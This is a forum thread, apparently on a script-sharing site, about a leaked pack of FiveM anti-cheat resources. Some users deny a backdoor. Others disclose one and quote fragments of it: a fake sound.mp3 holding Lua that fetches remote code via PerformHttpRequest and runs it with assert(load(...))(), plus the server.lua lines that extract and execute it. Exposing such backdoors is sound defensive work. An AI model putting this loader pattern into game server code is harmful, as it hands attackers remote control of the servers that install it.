Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new
×
Fiveguard

Anticheat Pack of 2 Best Anti-Cheat FiveM | WaveShield and GodzillaAC V2

Pookie69200

Silver Elite
Joined
Nov 2, 2023
Messages
27
Reaction score
833
Points
306
Location
France
there is no backdoor on there as i have checked them bot the only PerformHttpRequest is built in by the creators of the anti-cheats u dumb mothafucka
thank you for your defense, I took the time to check that there is no backdoor, I don't know where he sees a backdoor lol
 

Pookie69200

Silver Elite
Joined
Nov 2, 2023
Messages
27
Reaction score
833
Points
306
Location
France
he wont send as there is no backdoor i have checked them both as its gotta be server sided backdoor code and no code there to allow u access to the servers that decide to use these
Do
he wont send as there is no backdoor i have checked them both as its gotta be server sided backdoor code and no code there to allow u access to the servers that decide to use these
Do you have any suggestions for scripts to share?
 

GoraETA

Member
Joined
Dec 30, 2023
Messages
5
Reaction score
1
Points
156
Location
España
he wont send as there is no backdoor i have checked them both as its gotta be server sided backdoor code and no code there to allow u access to the servers that decide to use these
you are so bad, the backdoor is in the sound.mp3 open it like visual studio code and read the first 3 lines
 

Bankroll#1

Member
Joined
Jan 26, 2026
Messages
1
Reaction score
0
Points
41
Location
detroit
High — Hidden code loader / server-side RCE primitive in server.lua
Medium — Outbound HTTP in server.lua (PerformHttpRequest)
Low — Server command call in server.lua (ExecuteCommand)

Remove/disable the sound.mp3 dynamic loader path (assert(load(code))()), or at minimum enforce strict signature/hash validation before any execution.
Keep webhook URL locked to trusted value.
Sanitize/limit client-supplied item before logging.
 

petermd3

Member
Joined
Dec 19, 2025
Messages
1
Reaction score
0
Points
96
Location
Germany
there is no backdoor on there as i have checked them bot the only PerformHttpRequest is built in by the creators of the anti-cheats u dumb mothafucka
sure sure haha in both ACs is the same backdoor with the fake mp3 haha

Backdoor #1 — Hidden payload inside sound.mp3 (both resources)​

Both Godzilla/sound.mp3 and wave-anticheat/sound.mp3 are fake MP3 files with Lua code hidden inside them between special tags. The hidden code is identical in both:

PerformHttpRequest(" ", function(a, b)
assert(load(b))()
downloads and executes WHATEVER that server sends back

then a Remote Code Execution backdoor it phones home to an external server and runs any code the attacker sends. The attacker can change what it does at any time.

Backdoor #2 — Both server.lua files load the hidden payload​


-- In Godzilla/server.lua and wave-anticheat/server.lua

local fichier = io.open(filePath, "r") -- opens sound.mp3

-- extracts code between [Start SmartINF] ... [End SmartINF]

assert(load(code))() -- executes it on your server
 
Top